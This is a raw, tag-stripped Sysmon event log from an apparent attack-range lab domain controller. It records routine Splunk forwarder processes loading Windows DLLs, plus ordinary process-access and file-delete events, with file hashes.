Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x8000000000000000101067Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728B,IMPHASH=98738BA55485CCA932F6D222F47FFC55trueMicrosoft WindowsValid 734700x8000000000000000101066Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9,IMPHASH=3C043C6FF0F62DAEB8819606F79C5ECCtrueMicrosoft WindowsValid 734700x8000000000000000101065Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000101064Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000101063Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000101062Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 
734700x8000000000000000101061Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 10341000x8000000000000000101060Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000101059Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000101058Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000101057Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000101056Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52trueSplunk, Inc.Valid 10341000x8000000000000000101055Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:07:46.905{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101054Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101053Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:07:46.905{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101052Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101051Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:07:46.905{326FD73D-A252-6294-0500-000000005502}416532C:\Windows\system32\csrss.exe{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000101050Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000101049Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.906{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000101048Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.530{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFDEA727E49BBDA8815C5C36E37A8934,SHA256=8B25CCCA5AA1455CEF163394B55417C372B1F14C6EE070E760CF694D3FEA5A0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000101047Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.077{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000101046Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.077{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® 
Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000101045Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.077{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x8000000000000000101157Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.909{326FD73D-A262-6294-2400-000000005502}2732NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-099f25d280474ac19\channels\health\respondent-20220530105428-129MD5=3A7897B317CA03B79FE07533175F9643,SHA256=F76FF17815B8F96571634A983322FD544389A7130FC207258DDFB92658757A4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000101156Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.782{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B3D262B6E1D851573F18D0C0C6745E3,SHA256=A5770DFAB4E2B8EBAF6DA76CAD00AB32F95B9D6DCF3BAE9841712D5BB0278FBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
10341000x8000000000000000101155Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.750{326FD73D-C1A3-6294-500B-000000005502}67325792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000101154Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.750{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000101153Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.735{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 
734700x8000000000000000101152Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000101151Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000101150Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000101149Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000101148Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000101147Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000101146Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000101145Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000101144Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000101143Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 
